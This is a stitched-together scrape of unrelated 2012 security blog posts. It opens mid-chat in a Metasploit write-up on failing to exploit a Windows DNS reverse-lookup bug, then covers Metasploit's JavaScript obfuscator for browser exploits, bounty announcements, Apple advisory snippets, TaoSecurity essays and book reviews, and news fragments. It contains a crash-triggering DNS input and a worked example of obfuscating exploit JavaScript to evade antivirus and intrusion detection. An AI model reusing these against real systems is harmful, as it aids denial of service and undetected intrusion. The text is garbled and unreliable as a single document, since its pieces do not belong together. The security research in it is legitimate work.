(5:34:11 PM) jduck: then the if == begin will never catch it
(5:34:39 PM) Jon Butler: hmm
(5:34:43 PM) jduck: 0.in-addr.arpa == trigger
(5:34:53 PM) Jon Butler: i'll test it
(5:35:45 PM) Jon Butler: no crash
A skilled auditor may notice my error here. I thought for sure that would crash the service, but it didn’t. So I thought some more...
(5:35:54 PM) jduck: im running thru it in my head hehe
(5:36:02 PM) Jon Butler: yeah, its all good
(5:36:06 PM) Jon Butler: cant hurt to try
(5:36:13 PM) jduck: maybe .0.in-addr.arpa ?
(5:36:16 PM) Jon Butler: i was thinking lots of dots might do it as well
(5:36:20 PM) jduck: with a preceding period
Now at this point, I had some doubt that this was the bug at all and changed the subject of our conversation before Jon got a chance to test with this input. Silly me. Also, Jon was having some issues getting a debugger going attached to the service.
(5:24:47 PM) Jon Butler: also, protip: dont atatch windbg to the DNS client then wait while windbg tries to resolve microsoft.com to get symbols
Jon and I spent the rest of Tuesday evening and most of Wednesday evening flailing every which way except the right direction. Jon battled the symbol resolution problem while I went off on a tangent trying to trigger the bug in XP. By Wednesday evening (late night Wednesday for Jon), he had solved the symbol issue and began stepping through the code to gain a better understanding. We threw several ideas back and forth, but none of them lead to a crash. Eventually, time got the better of us and we called it a day.
NOTE: In order to work around the symbol issue, its possible to use the “symchk” executable to download the symbols for the “dnscache” service process before attaching to it. Once downloaded, set the _NT_SYMBOL_PATH variable to point to *ONLY* the local symbol directory, and voila.
Thursday, Jon came online and we continued reviewing the changed functions within the XP DNSAPI.dll. We were hoping that they might give us some insight that we didn’t get before. On Jon’s recommendation, I asked HD about the Windows XP vector. It went something like this:
19:54 <@jduck> will rapid7 give $500 for the local xp exploit?
19:54 <@hdm> jduck: sure if its a remote on windows 7
So I abandoned my efforts trying to trigger the bug via the LPC on XP, and diverted my attention back to Windows 7. I started by going back through the changes (still using XP binaries) one at a time, hoping to eliminate any that weren’t security related. I found some changes related to locking, but it’s unclear if that was related. After I went through all of these changes, and didn’t find any glaring issues, I went back to diffing the Windows 7 binaries. I grabbed fresh copies of the DLLs, grabbed fresh copies of their symbols, created fresh IDBs and BinDiff'd them. To my surprise, there was were only four changed functions!
After getting my Windows 7 VM going, working around the symbol resolution issue, I started playing around sending inputs. I read the IPv6 version, ”_Dns_Ip6ReverseNameToAddress_A”,
and spent a couple of hours sending various inputs. Finally, I got a crash!
Unfortunately, it was only a 0xc00000fd exception. The human-readable description of this exception code, which irks one of my pet peeves, is often displayed as “Stack Overflow”. This is not the kind of crash you want to see when developing an exploit since this kind of crash is rarely exploitable. In this particular case, there is no exception handler, so it simply kills the process. The service is set to restart automatically twice, and reset counts after one day, but that isn’t terribly helpful (try: sc qfailure dnscache).
Let’s take another look at the decompiler output for the Ip4 version. Consider an input string of “.0.in-addr.arpa”. On the first iteration, a ‘0’ will be found, so “v_suffix” will simply be decremented. On the second iteration, a ‘.’ character is found on line 33. Next, it is overwritten with a NUL byte on line 38 and re-incremented. The “strtoul” function is called on line 40 and the return value from it is merged into ultimate return value on line 43. Since “v_suffix” does not point to the beginning of the buffer, it will be decremented on line 47. Note that after decrementing the pointer here, it will point at the beginning of the buffer (the first ‘.’ character). The next statement that is executed is “--v_suffix;” on line 32. At this point, the pointer has escaped the bounds of the local buffer, and will never again have the chance to point to the beginning. If no ‘.’ character is found before the beginning of the stack is reached, the 0xc00000fd exception will be raised when the guard page at the top of the stack is accessed.
Even though I managed to crash the process, I wasn’t 100% sure that this was the reason Microsoft released an update. I didn’t see anything interesting in the other changed functions. It seemed unlikely that anything good could come from this since there was no return address or function pointer on the stack before the function.
My first thought was to assume that I could control the data above the buffer on the stack. I hypothesized that I could do this via some deeper call stack that would occur in a preceding function call. Perhaps controlling this data would allow passing an input string that was longer than the function originally allowed. That would violate assumptions made by the programmers, and could lead to further corruption. So I created a WinDbg script that would put more valid-ish strings into the stack above (lower addresses) the buffer.
First I tested with the Ip4 variant, but it didn’t yield anything fun. Then, I tried some things with the Ip6 version, which writes one byte at a time for each pair of nibbles encountered (ex. “a.b.”). It will write up to 16 bytes (the size of the destination buffer passed in, likely a struct in6_addr). I double-checked and concluded that it wasn’t possible to cause a buffer overflow this way.
Although I didn’t get an awesome crash from this experiment, I found that it was possible to prevent a crash from occurring this way. In one instance, an already-used return address on the stack contained a ‘.’ character and prevented the crash. Being able to force this type of behavior is certainly advantageous, so I wrote this down for later.
Slightly disappointed with these results, I took a look at the Ip4 version’s stack frame.
Just before the data in “v_buf”, we find the pointer “v_out_ptr”. After a brief look over, it seemed the best next-step would be to try to corrupt this pointer and cause the “v_result” value to be written somewhere unexpected. If the pointer happened to contain a ‘.’ character, it would get replaced by a NUL byte. That is, if “v_out_ptr” was 0x00132e40, it would then become 0x00130040. It is possible for this to happen one of two ways. First, we would need to find some way to control the length of preceding function calls stack frames (ex. via “alloca”). This is often a long tedious path, for which not many good tools exist. The other option means crossing our fingers and hoping ASLR gives us a lucky value. I love rare cases where a mitigation contributes to exploitability!
NOTE: Although it’s not visible in the decompiler output, the “v_out_ptr” is read from the stack immediately before writing the output value. This is one of the reasons why the decompiler can be misleading when doing exploit development.
Initially, I tried a few experiments using the Ip6 version. Unfortunately, the Ip6 version has far more strict handling of the return from “strtoul”. If a zero is returned (ex. a string like “z.”), or if the value is greater than 15, the loop terminates and nothing is written. So I went to check the situation using the Ip4 version. It is a bit more lenient in that it accepts zero return values, as you can see on line 41. However, if we fail that conditional the function returns zero and no write occurs. In fact, only way to get the Ip4 function to write to “v_out_ptr” is when “v_suffix” points at the start of the buffer (line 44). Ugh, strict constraints or impossibilities, not a good feeling.
Finally, on Saturday, I caved in and decided to reach out to Neel Mehta. As the original discoverer of the vulnerability, I figured he had a unique perspective on the issue. After exchanging several emails, Neel confirmed that I had nailed the root cause and offered several promising ideas for where to go next.
The first idea was to use TCP based LLMNR resolution. I looked at my Windows 7 SP0 machine and it wasn’t listening on TCP port 5355. Bummer. Further googling led to an old TechNet arcticle that states “TCP-based LLMNR messages are not supported in Windows Vista”. Even if Windows 7 supports this feature, RFC4795 says TCP resolution is only used when the server has a reply that is too long for UDP. In this situation, similar to traditional DNS, the truncation (TC) bit is set in the flags section. Although it may be possible to construct a serious of queries and/or spoofed responses in order to elicit a truncated response, this was not investigated. This could be considered an exercise for the reader, should you be so inclined.
The second idea that Neel conveyed centered around the additional registers that are pushed onto the stack within the course of the functions executing. Looking at push instructions in the function shows that esi, edi, and ebx are pushed to the stack (in that order). These registers are later restored prior to returning to the calling function, “Dns_StringToDnsAddrEx”. After returning, the ebx register is checked against the value 0x17. The edi register is passed to one of the “RtlIpv6StringtoAddressEx” functions (ANSI or UNICODE). The esi register is passed as the destination argument to one of two ‘‘bzero(dst, 0x40)” calls. Unfortunately, none of this looked particularly promising.
The third idea that Neel proposed was to investigate the interaction between regular DNS queries and these functions. It turns out that the calling function is called from “DnsGetProxyInfoPrivate” which is exported along with “DnsGetProxyInformation”. We made no further effort to investigate this avenue. Perhaps another exercise for the reader :-)
With Saturday winding down, I decided to put together a quick trigger-fuzzer to test if random luck would lead to anything sexy. I ran it for an hour or so, but quickly got tired of looking at 0xc00000fd exception after 0xc00000fd exception. My hope had started to run out and my batteries needed recharging, so I crashed.
Sunday, Jon and I went back and forth discussing whether or not the issue was exploitable at all. We recapped our findings, but ultimately came to the conclusion that there was no way we could write a reliable exploit in time to qualify for the bounty. I had previously said I’d conduct a few more experiments in the debugger to see if corrupting the other stack-saved registers led to any nice crashes in the parent function. I set a break point in the processing loop of each of the vulnerable functions and fired off some trigger queries. Each time the breakpoint was hit, I wrote a ‘.’ character to a byte offset in the saved register area and continuing execution. Out of all 16 bytes, only one led to a different crash. This was the saved esi value, which was subequently used in the bzero operation.
Similar to the “v_out_ptr” value, this value was a stack pointer that points to a the output area of “Dns_StringToDnsAddrEx”. If it happened to contain a ‘.’ character, it would get modified to point to an address higher on the stack. This really isn’t much help since we’re already higher than any data that could affect code flow (return addreses, etc). This path seemed like a dead end. Having fulfilled my promise to try this experiment, I readied myself to admit defeat.
Prior to formally giving up on the bounty, Jon suggested I email Neel one last time to ask if he managed to obtain code execution from this vulnerability. Neel replied stating he hadn’t. He decided to stop work on the bug once Microsoft agreed that the issue should be rated Critical. He reiterated that he believes it’s possible to exploit this bug, but agreed that it was definitely more challenging than most bugs.
Although I want to believe that the bug is exploitable, I simply can’t see a way. Jon and I have folded. I would love to say this bug is unequivocally not exploitable, but as we have seen in the past this probably isn’t wise. Regardless, it seems to me, and I believe the facts show, that this bug is challenging enough that it’s not possible to write a reliable exploit leveraging it in one week.
Despite my opinion, there are still some avenues left unexplored for those that are inclined to push forward on this bug. If you wish to continue where we left off or just play with bug, our technical notes are available and a DoS Metasploit module has been added to the tree. If you do push the analysis envelope forward on this bug, we hope you will contribute your findings back to the community. Good luck and happy exploiting to you all!
As of this writing, Metasploit has 152 browser exploits. Of those, 116 use javascript either to trigger the vulnerability or as a means to control the memory layout of the browser process [1]. Right now most of that javascript is static. That makes it easier for anti-virus and IDS folks to signature. That makes it less likely for you to get a shell.
Skape recognized this problem several years ago and added Rex::Exploitation::ObfuscateJS to address it. This first-gen obfuscator was based on substituting static strings which requires a priori knowledge of what you want to substitute, meaning you need to take care of variable names. Changes to the code need to be reflected in the calls to obfuscate() and anything you miss will remain static. It also means that you have to ensure variable names don't end up in a string or elsewhere where they might get inadvertantly smashed. To overcome these limitations, several modules employ a simple technique of using random values for javascript vars but they lose out on string manipulations.
Enter RKelly, a pure-ruby javascript lexer. Having a full parser gives us a lot more power than the previous obfuscation techniques available in the framework. For one, it gives us type information for literals, which makes string and number mangling really easy. While a particular static ROP chain might be easy to fingerprint, that same string can be easily represented numerous ways through javascript manipulations. Some of the ideas for mangling literals came from Drivesploit with several new techniques thrown in as well. There's even a wrapper class, Rex::Exploitation::JSObfu for dealing with it. Syntax is simlar to it's older cousin, but without the need for klunky lists of varnames to replace.
Here's an example from windows/browser/cisco_anyconnect_exec:
js = ::Rex::Exploitation::JSObfu.new %Q|
var x = document.createElement("object");
x.setAttribute("classid", "clsid:55963676-2F5E-4BAF-AC28-CF26AA587566");
x.url = "#{url}/#{dir}/";
|
js.obfuscate
html = "<html>\n<script>\n#{js}\n</script>\n</html>"
And the html as delivered to a browser:
<html>
<script>
var GPSweCkB = document.createElement((function () { var XoNO="ject",apoc="ob"; return apoc+XoNO })());
GPSweCkB.setAttribute((function () { var pYmx="ssid",aTIE="a",tvPA="cl"; return tvPA+aTIE+pYmx })(), (function () { var MbWt="7566",UcNA="7",PUHo="c",yFIi="6-2F5",YXvW="sid",sYCs="E-4BAF",SZBF="9",yZMK="-AC28-CF26AA",BmVk="l",AbBB="58",iRQW="636",RQLv=":55"; return PUHo+BmVk+YXvW+RQLv+SZBF+iRQW+UcNA+yFIi+sYCs+yZMK+AbBB+MbWt })());
GPSweCkB.url = String.fromCharCode(104,0164,0164,112,0x3a,0x2f,0x2f,49,50,067,056,48,0x2e,48,46,49,072,0x38,060,070,060,47,47,112,0165,0x46,0x62,0x4a,111,0146,0124,0143,0172,0x43,89,82,0x75,65,111,81,47);
</script>
</html>
Of course, this will be different for each request.
So now a call to arms. We could use some help testing 116 browser exploits to see if javascript obfuscation is viable and several issues make that more challenging. For one, getting ahold of the vulnerable software is sometimes quite difficult. Also, in some cases where the vulnerability has very restrictive memory layout requirements, obfuscation may break the exploit.
What we need is people with old browsers and old plugins/toolbars/etc who can:
If you're interested in helping out, contact me in #metasploit on FreeNode, or @egyp7 on twitter.
[1] Gathered with the following commands:
$ ls modules/exploits/*/browser/*.rb | wc -l
152
$ ls modules/exploits/*/browser/*.rb | xargs grep '<script' | wc -l
116
If you're packing to go to Black Hat, Defcon or Security B-Sides in Las Vegas, make sure you also download Metasploit 4.0 to entertain you on the plane ride. If you missed the recent announcement, check out this blog post for a list of new features.
The new version is now available for all editions, and here's how you upgrade:
$ sudo bash
# cd /opt/framework-3.x.x/msf3/
# svn update
In case you get stuck or have any questions, make sure you visit the Rapid7 Community to find answers, tips & tricks. Alternatively, just drop by our Black Hat booth #109 and ask us directly!
The Metasploit team is excited to announce a new incentive for community exploit contributions: Cash! Running until July 20th, our Exploit Bounty program will pay out $5,000 in cash awards (in the form of American Express gift cards) to any community member that submits an accepted exploit module for an item from our Top 5 or Top 25 exploit lists. This is our way of saying thanks to the open source exploit development community and encouraging folks who may not have written Metasploit modules before to give it a try.
All accepted submissions will be available under the standard Metasploit Framework license (3-clause BSD). Exploit selection is first-come, first-serve; please see the official rules for more information.
Contributors will have a chance to claim a vulnerability from the Top 25 ($100) and Top 5 ($500) lists. Once a vulnerability has been claimed the contributor will be given one week to work on a module. After a week the vulnerability will be open again to the community. Prizes will only be paid out to the first module contributor for a given vulnerability. The process of claiming a vulnerability is an attempt at limiting situations where multiple contributors submit modules for the same vulnerability. To stake a claim, send an email to bounty@metasploit.com with the name of the vulnerability from the list below. All claims will be acknowledged, so please wait until receiving the acknowledgement before starting on the exploit. Each contributor can only have one outstanding claim at a time.
If you need help with the Metasploit module format, feel free to drop by our IRC channel (#metasploit on irc.freenode.net), and take a look at the some of the community documents:
Thanks and have fun!
-HD
Are you an artist? Do you possess mad ASCII art skills? Do you like the idea of having your artwork on the face of an open source project that's one of the world's largest, de-facto standard for penetration testing with more than one million unique downloads per year? Then read on!
One of the first things many people likely noticed when updating to the Metasploit Framework version 4.0-testing was the new ASCII art. In addition to all the new awesome features we have been adding to Metasploit lately we wanted to give Metasploit a new look and appearance. When version 4.0-test first came out we had roughly 5 or 6 new banners. Slowly we have been adding to that number. Now is your chance to make your mark on the Metasploit Project.
The Metasploit team would like to encourage the talented folks from every corner of the community to join the ASCII art fun, and submit your most awesome, creative banners to us. All submissions should be uploaded to either Metasploit Redmine (http://dev.metasploit.com), or e-mailed to msfdev@metasploit.com. If selected, your artwork will be committed in our banner.rb file, together with the following banners that we currently have:
For questions, as always, please feel free to drop by our IRC channel (#metasploit on irc.freenode.net).
APPLE-SA-2012-03-12-1 Safari 5.1.4 Safari 5.1.4 is now available and addresses the following: Safari Available for: Windows 7, Vista, XP SP2 or later Impact: Look-alike characters in a URL could be used to masquerade a website Description: The International Domain Name (IDN) support in Safari [...]
APPLE-SA-2012-03-07-3 Apple TV 5.0 Apple TV 5.0 is now available and addresses the following: Apple TV Available for: Apple TV (2nd generation) Impact: Applications that use the libresolv library may be vulnerable to an unexpected application termination or arbitrary code execution [...]
APPLE-SA-2012-03-07-2 iOS 5.1 Software Update iOS 5.1 Software Update is now available and addresses the following: CFNetwork Available for: iPhone 3GS, iPhone 4, iPhone 4S, iPod touch (3rd generation) and later, iPad, iPad 2 Impact: Visiting a maliciously crafted website may lead to the [...]
APPLE-SA-2012-03-07-1 iTunes 10.6 iTunes 10.6 is now available and addresses the following: WebKit Available for: Windows 7, Vista, XP SP2 or later Impact: A man-in-the-middle attack while browsing the iTunes Store via iTunes may lead to an unexpected application termination or [...]
On 19/03/12 At 05:27 PM
On 15/03/12 At 05:02 PM
On 20/03/12 At 12:22 PM
The recent Tweet by hogfly (@4n6ir) made me ponder this question. He points to an Aviation Week story by David Fulghum, Bill Sweetman, and Amy Butler titled China's Role In JSF's Spiraling Costs. It says in part:
How much of the F-35 Joint Strike Fighter’s spiraling cost in recent years can be traced to China’s cybertheft of technology and the subsequent need to reduce the fifth-generation aircraft’s vulnerability to detection and electronic attack?
That is a central question that budget planners are asking, and their queries appear to have validity. Moreover, senior Pentagon and industry officials say other classified weapon programs are suffering from the same problem. Before the intrusions were discovered nearly three years ago, Chinese hackers actually sat in on what were supposed to have been secure, online program-progress conferences, the officials say.
The full extent of the connection is still being assessed, but there is consensus that escalating costs, reduced annual purchases and production stretch-outs are a reflection to some degree of the need for redesign of critical equipment. Examples include specialized communications and antenna arrays for stealth aircraft, as well as significant rewriting of software to protect systems vulnerable to hacking.
It is only recently that U.S. officials have started talking openly about how data losses are driving up the cost of military programs and creating operational vulnerabilities, although claims of a large impact on the Lockheed Martin JSF are drawing mixed responses from senior leaders. All the same, no one is saying there has been no impact.
While claiming ignorance of details about effects on the stealth strike aircraft program, James Clapper, director of national intelligence, says that Internet technology has “led to egregious pilfering of intellectual capital and property. The F-35 was clearly a target,” he confirms.
The point of this article is to question the impact, in business and operational terms, of the cyberwar China continues to prosecute against the West.
The toughest question in digital security is "who cares" because it is usually extremely difficult to determine the impact of an intrusion. Consider the steps required to define the business and operational impact of the theft of intellectual property (as one example -- there are many others).
Steps 1 and 2 are largely technical, but 3-6 are more business-focused. From what I have seen, everyone who is a victim in the ongoing cyberwar struggles to conduct "battle damage assessment" (BDA) for digital intrusions. Articles like the one I cited are examples showing how difficult it is to determine if anyone should care about China's exploitation of Western IP.
The Economist presents these charts for the following reason:
In the spring of 2011 the Pew Global Attitudes Survey asked thousands of people worldwide which country they thought was the leading economic power. Half of the Chinese polled reckoned that America remains number one, twice as many as said “China”. Americans are no longer sure: 43% of US respondents answered “China”; only 38% thought America was still the top dog. The answer depends on which measure you pick. (emphasis added)
The reason I like these charts is that they remind me of how many security practitioners think about "being secure." Managers likely often ask security staff "Are we secure?" The truth is there is no single number, so anyone selling you a "risk" number is wasting your time (and probably your money). However, it would be much more useful to display a chart like that created by the Economist. The security staff could choose a dozen or more simple metrics to paint a picture, and let the viewer interpret the answer using his or her own emphasis and bias.
Another reason I like the Economist chart is that the magazine built it using specified assumptions of future activity, listed in the article. If you disagree with these assumptions you can visit the second link I posted to devise your own charts. Although not shown here, what would be even more useful is showing these charts as a time series, with snapshots for January, then February, and so on. This "small multiples" approach (promoted by Tufte) capitalizes on the skill of the human eye and brain to observe and observe differences in similar objects.
If you had to pick a dozen or so indicators of security for a chart, what would you depict? The two I consider non-negotiable are 1) incidents per unit time and 2) time to containment for incidents.
I'd like to thank the sponsors of the event, depicted on the photo of the back of the T-shirt at left. Props to whomever designed the shirt -- it's one of my favorites. The award itself looks great, and the gift certificate to the Apple store will definitely help with an iPad 3, as intended!
Long-time readers may remember that I won Best Non-Technical Blog at the same event in 2009.
Winning this award has given me a little more motivation to blog this year. I admit that communicating via Twitter as @taosecurity is much more seductive due to the presence of followers and the immediate feedback!
Speaking of Twitter, SC Magazine named @taosecurity as one of their 5 to follow, which I appreciate.
And speaking of SC Magazine, they awarded my company Mandiant their best security company award.
On 20/03/12 At 11:09 AM
This is not an unbiased review. Michael W. Lucas cites my praise for two of his previous books, and mentions one of my books in his text. I've also stated many times that MWL is my favorite technical author. With that in mind, I am pleased to say that SSH Mastery is another must-have, must-read for anyone working in IT. I imagine that most of us use OpenSSH and/or PuTTY every day, but I am sure each of us will learn something about these tools and the SSH protocol after reading SSH Mastery.
If the malware authors are ready to provide the samples, the authors of the book you’re reading are here to provide the skills. Practical Malware Analysis is the sort of book I think every malware analyst should keep handy. If you’re a beginner, you’re going to read the introductory, hands-on material you need to enter the fight. If you’re an intermediate practitioner, it will take you to the next level. If you’re an advanced engineer, you’ll find those extra gems to push you even higher—and you’ll be able to say “read this fine manual” when asked questions by those whom you mentor.
Practical Malware Analysis is really two books in one—first, it’s a text showing readers how to analyze modern malware. You could have bought the book for that reason alone and benefited greatly from its instruction. However, the authors decided to go the extra mile and essentially write a second book. This additional tome could have been called Applied Malware Analysis, and it consists of the exercises, short answers, and detailed investigations presented at the end of each chapter and in Appendix C. The authors also wrote all the malware they use for examples, ensuring a rich yet safe environment for learning.
Therefore, rather than despair at the apparent asymmetries facing digital defenders, be glad that the malware in question takes the form it currently does. Armed with books like Practical Malware Analysis, you’ll have the edge you need to better detect and respond to intrusions in your enterprise or that of your clients. The authors are experts in these realms, and you will find advice extracted from the front lines, not theorized in an isolated research lab. Enjoy reading this book and know that every piece of malwareyou reverse-engineer and scrutinize raises the opponent’s costs by exposing his dark arts to the sunlight of knowledge.
To announce the book, the publisher is running this promotion: Use discount code REVERSEIT to get 40% off Practical Malware Analysis. One week only! Free ebook with all print book purchases.
The authors also started a new blog at practicalmalwareanalysis.com.
On 14/03/12 At 01:03 PM
On 19/03/12 At 02:47 PM
To spot staff with the incentive to steal (over and above the obvious fact that money is quite useful), anti-fraud software scans e-mails for evidence of money troubles...
Ernst & Young (E&Y), a consultancy, offers software that purports to show an employee’s emotional state over time: spikes in trend-lines reading “confused”, “secretive” or “angry” help investigators know whose e-mail to check, and when. Other software can help firms find potential malefactors moronic enough to gripe online, says Jean-François Legault of Deloitte, another consultancy...
Dick Oehrle, the chief linguist on the project, explains how it works. First, the algorithm digests a big bundle of e-mails to get used to employees’ language. Then human lawyers code the same e-mails, sorting things as irrelevant, relevant or serious. The human feedback and the computers’ results are then reconciled, so the system gets smarter. Mr Oehrle says the lawyers also learn from the computers (presumably such things as empathy and the difference between right and wrong).
To find employees with the opportunity to steal, the software looks for what snoops call “out of band” events: messages such as “call my mobile” or “come by my office” suggest a desire to talk without being overheard. E-mails between an employee and an outsider that contain the words “beer”, “Facebook” or “evening” can suggest a personal relationship...
Employers without such technology are “operating blind”, says Alton Sizemore, a former fraud detective at America’s FBI... [N]early all giant financial firms now run anti-fraud linguistic software, but fewer than half of medium-sized or small financial firms do...
Prospective users typically pay for a single “snapshot” search of 12 months of company records, according to APEX Analytix, a developer of the software in Greensboro, North Carolina. For a company with 10,000 employees, this costs about $45,000. Unless a company is very small, evidence of fraud almost always surfaces, convincing clients to sign up for a yearly package that costs three or four times as much as a spot-check, says John Brocar of APEX Analytix.
Why spend the money... If a company shows it has systems in place to detect this kind of thing, and starts investigating before outsiders do, it may have an easier time in court.
When I read this story it reminded me of my advice to keep CIRT and Internal Investigations separate. Notice the repeated mention of "lawyers" in the Economist story. There is no reason for this sort of technology or responsibility to reside in the Computer Incident Response Team. CIRTs should focus on external threats. Internal Investigations should focus on internal threats, e.g. employees, contractors, and other authorized parties who may perform unauthorized activities. II should collaborate closely with legal and human resources and should not use CIRT tools or techniques. This separation of duties was invaluable when I ran GE-CIRT because we could reassure constituents that our analysts focused on bad guys outside the company, not our own users.
On 19/03/12 At 11:54 AM
On 20/03/12 At 04:37 PM
In brief this book will tell you more about the awesome Sysinternals tools than you might have thought possible. One topic that caught my attention was using Process Monitor to summarize network activity (p 139). This reminded me of Event Tracing for Windows and Network Tracing in Windows 7. I remain interested in this capability because it can be handy for incident responders to collect network traffic on endpoints without installing new software, relying instead on native OS capabilities.
I suggest keeping a copy of this book in your team library if you run a CIRT. Thorough knowledge of the Sysinternals tools is a great benefit to anyone trying to identify compromised Windows computers.
I had one small issue with the book, and that involved its introduction to Microsoft's STRIDE model. I blogged about this years ago in Someone Please Explain Threats to Microsoft. The Web sec book says on p 36:
STRIDE is a threat classification system originally designed by Microsoft security engineers. STRIDE does not attempt to rank or prioritize vulnerabilities... instead, the purpose of STRIDE is only to classify vulnerabilities according to their potential effects. This is immensely useful information to have when threat modeling an application...
To see my critique of STRIDE, please see my linked post. Basically, STRIDE is best describe as "bad stuff," and includes a mix of attacks and vulnerabilities with no real "threats."
Nevertheless, if you're looking for a compact and detail-packed exploration of Web application security, take a look at Web Application Security: A Beginner's Guide.
By the way, I've written alot about confusing terms like "threat," "vulnerability," "risk," etc. over the years. One of my earliest posts provides background -- The Dynamic Duo Discuss Digital Risk if you are so inclined.
This is also an excellent book, although I did not read it thoroughly enough to warrant a review. On p xxix the authors note that 30% of the book is "new or extensively revised" and 70% of the book has "minor or no modifications." I was very impressed to see the authors outline changes by chapter on pages xxx-xxxii. That is not common in second editions, in my experience.
The book is very thorough and introduces technology along with attacks and defenses. Their "hack steps" sections provide a playbook for assessing Web applications. Some sections even mention logging and/or alerting -- I'd like to see more of that here and elsewhere! The book also includes end-of-chapter questions with answers posted on the book Web site, mdsec.net/wahh.
Speaking of the Web site, the authors also post source code, links to tools, and checklists, plus labs costing a $7/hour fee. That is a new approach I haven't seen elsewhere, but I think it's an interesting idea.
At 912 pages WAHH2E offers a ton of content written in a clear and convincing style. Great work guys. My only concern was their refusal to cite sources. That makes a real difference in my mind; give credit where credit is due in the third edition.
I did not read the whole book, hence I'm posting only my "impressions" here. I recommend reading this book if you want to know a lot, and I mean a lot, about how screwed up Web browsers, protocols, and related technologies truly are. Because many points of the book are tied to specific browser versions, I suspect its shelf life to degrade a little more rapidly than some other technical titles. Still, I am shocked by the amount of research and documentation Michal performed to create The Tangled Web.
As always, Michal's content is highly readable, very detailed, and well-sourced. It's a great example for other technical authors. Great work Michal!
In brief, Network Warrior, 2nd Ed is the book to read if you are a network administrator trying to get to the next level. All of my praise from the previous review apply to the new book. The book is really that good, primarily because it combines very clear explanations with healthy doses of real-world experience. Thanks to Mr Donahue for taking the time to update his book!
Despite the passage of time, I thought HSB stood up very well. Most of the problems discussed in the book and the techniques to find them should still work today. The targets have changed somewhat (XP was the target in the book; Windows 7 would be more helpful today -- thought not everywhere).
Again, this is an impression and not a review, so I only offer thoughts and not opinions or judgements on the text. From what I saw, the book appears well written with helpful diagrams and screen shots. It covers a lot of surface area and ways to exploit it.
One note for the history buffs: the foreword says:
When Jesse James, the famous outlaw of the American West, was asked why he robbed banks, he replied, Thats where the money is.
I'm sure most of you think that Willie Sutton said that, not Jesse James. According to Snopes neither of them said it:
While lore would have it that the bank robber replied "Because that's where the money is" to that common question, Sutton denied ever having said it. "The credit belongs to some enterprising reporter who apparently felt a need to fill out his copy," wrote Sutton in his autobiography. "I can't even remember where I first read it. It just seemed to appear one day, and then it was everywhere."
But back to the book -- should you buy it? If your job involves finding vulnerabilities in Windows software (and this book does have more of a Windows slant), I would take a close look at it.
I liked the following aspects of the book: integration of history, real examples, diversity of approaches, case studies, and examples. I thought the book was easy to read and well presented. Paired with more specific, newer books on finding vulnerabilities, I think Fuzzing is a winner.
My only real dislike involved the quotes by former US President George W. Bush at the start of each chapter. I thought they were irrelevant and a distraction.
These questions can be tough to answer from a purely theoretical perspective. I propose the following approach.
First, conduct a tabletop exercise where you simulate adversary actions. At each stage of the imagined attack, consider what evidence an intruder might create while taking actions against your systems. For example, if you are trying to determine how to detect and respond to an attack against a Web server, you're almost certainly going to need Web server logs. If you don't currently have access to those logs, you've just identified a gap that needs to be addressed. I recommend this sort of tabletop exercise first because you will likely identify deficiencies at low cost. Addressing them might be expensive though.
Second, conduct a technical exercise where a third party simulates adversary actions. This is not exactly a pen test but it is the sort of work a red team conducts. Ask the red team to carry out the attacks you previously imagined to determine if you can detect and respond to their activity. This should be a controlled action, not an "anything goes" event. You will see whether the evidence and processes you identified in the first step help you detect and respond to the red team activity. This step is more expensive than the previous because you are paying for red team attention, and again fixes could be expensive.
Third, you may consider re-engaging the red team to carry out a less restrictive, more imaginative adversary simulation. In this exercise the red team isn't bound by the script you devised previously. See if your improved data and processes are sufficient. If not, work with the red team to devise better detection and response so that you can handle their attacks.
At this point you should have the data and processes to deal with the majority of real-world attacks. Of course some intruders are smart and creative, but you have a chance against them now given the work you just performed.
On 12/03/12 At 03:40 PM
On 09/03/12 At 01:26 PM
On 05/03/12 At 07:40 PM
On 20/03/12 At 03:20 PM
Thank you to all publishers who sent me books in 2011. I have plenty more to read in 2012.
Congratulations to all the authors who wrote great books in 2011, and who are publishing titles in 2012!
This year I spoke at the Executive Security Action Forum on a panel moderated by PayPal CISO Michael Barrett alongside iDefense GM Rick Howard and Lockheed Martin CISO Chandra McMahon. I thought our panel offered value to the audience, as did much of the remainder of the event.
Most of the speakers and attendees (about 100 people) appeared to have accepted the message that prevention eventually fails and that modern security is more like a counterintelligence operation than an IT operation.
After ESAF (all day Monday) I divided my time among the following: speaking to visitors to the Mandiant booth, discussing security issues with reporters and industry analysts, and walking the RSA exposition floor. I also attended the Wednesday panel where one of our VPs, Grady Summers, explained how to deal with hacktivists.
Speaking of the RSA floor, I took the photo at left praising the 55 new vendors appearing at the exposition for the first time. I counted 13 I recognized as "established" companies or organizations (Airwatch, CyberMaryland, Diebold, FireHost, Fluke Networks, Global Knowledge, GoDaddy.com, Good Technology, Nexcom, PhishMe, Prolexic Technologies, Qosmos, and West Coast Labs). I didn't recognize the other 42. There were probably dozens more who were not first-time RSA vendors that I wouldn't recognize either.
I suppose there are different ways to think about this situation. A positive way would be to view these new companies as signs of innovation. However, I didn't really see much that struck me as new or innovative. For example, a company specializing in password resets doesn't really get the heart pumping.
Another point of view could be that the presence of so many new companies means venture capital is active again. I saw plenty of that at work for certain companies who I know have just rebranded, relaunched, or have been resuscitated in recent months. Several of them sported mammoth booths and plenty else. They must figure that if they have 7 or 8 figures to spend, they're going to put it into marketing!
I was in some ways overwhelmed by the number of attendees. I saw references to over 20,000 people attending RSA 2012. I believe many of them wore $100 (or even free, courtesy of vendors) "expo only" passes. With 20,000 people willing to participate in a security event, that tells me my @taosecurity Twitter follower count (over 11,000 today) has more room to grow. I would not have expected to rise much beyond 10,000 when I started Tweeting.
One of the best aspects of RSA 2012 was the Security Bloggers Meetup, which I was able to attend in person as I blogged previously.
My buzzphrase of the conference was "big data." To me, "big data" sounds like SIEM warmed over. I'll have more to say on this topic in future posts.
I'll probably return to RSA next year on behalf of my company, and again I will focus on the exposition and non-session activities. It's the only place where you can see so many security vendors in one place.
What did you think of RSA this year?
On 23/03/12 At 12:52 PM
On 06/03/12 At 01:50 PM
Huawei hardware won't be part of National Broadband Network, says Australia originally appeared on Engadget on Mon, 26 Mar 2012 02:43:00 EDT. Please see our terms for use of feeds.
PermalinkPaswall claims that she didn’t realize that she was walking into a wall of glass as she approached the store, and says that she broke her nose as a result of the collision.The Manhassett Apple Store has floor-to-ceiling glass walls at the front and rear of the store, with doors in the middle at both ends. It's a similar design to the Scottsdale Quarter and Lincoln Park stores.
Her suit claims that “the defendant was negligent ... in allowing a clear, see-through glass wall and/or door to exist without proper warning.”
